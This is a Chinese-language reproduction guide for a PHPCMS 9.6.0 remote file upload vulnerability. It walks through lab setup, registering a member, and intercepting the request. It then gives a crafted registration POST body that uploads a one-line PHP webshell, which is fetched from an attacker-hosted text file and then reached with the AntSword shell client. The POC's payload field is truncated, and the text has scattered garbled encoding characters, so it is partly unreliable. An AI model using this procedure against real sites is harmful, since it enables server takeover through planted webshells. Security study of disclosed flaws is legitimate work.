一、漏洞描述
PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,該漏洞源于PHPCMS程序在下載遠(yuǎn)程/本地文件時沒有對文件的類型做正確的校驗(yàn)。遠(yuǎn)程攻擊者可以利用該漏洞上傳并執(zhí)行任意的PHP代碼。
二���、漏洞影響版本
PHPCMS 9.6.0
三��、漏洞環(huán)境搭建
1.?官方下載phpcms v9.6.0版本,下載地址: http://download.phpcms.cn/v9/9.6/
2.?解壓下載的文件,然后把文件放到phpstudy的網(wǎng)站根目錄下,瀏覽器訪問192.168.10.171/phpcms/install/install.php,開始安裝
3.?安裝完成后,登錄后臺,生成首頁
四�、漏洞復(fù)現(xiàn)
1.瀏覽器訪問前臺,注冊一個會員
2.點(diǎn)擊注冊頁面,抓包
3.在另一個系統(tǒng)(kali),開啟web服務(wù),然后在web根目錄下創(chuàng)建一個txt文件,寫入如下信息
4.構(gòu)造POC���,上傳一句話木馬
siteid=1&modelid=11&username=test2&password=test2123&email=test2@163.com&info[content]=?
&dosubmit=1&protocol=
修改數(shù)據(jù)包,添加POC,需要注意: 在repeater里測試go時每一次都要修改username�,password和email字段值,保證不能重復(fù)�。
5.修改抓包內(nèi)容,添加POC
6.可以看到返回包的內(nèi)容包含了上傳文件的路徑
7.蟻劍連接
云天安全訂閱號
云天安全服務(wù)號
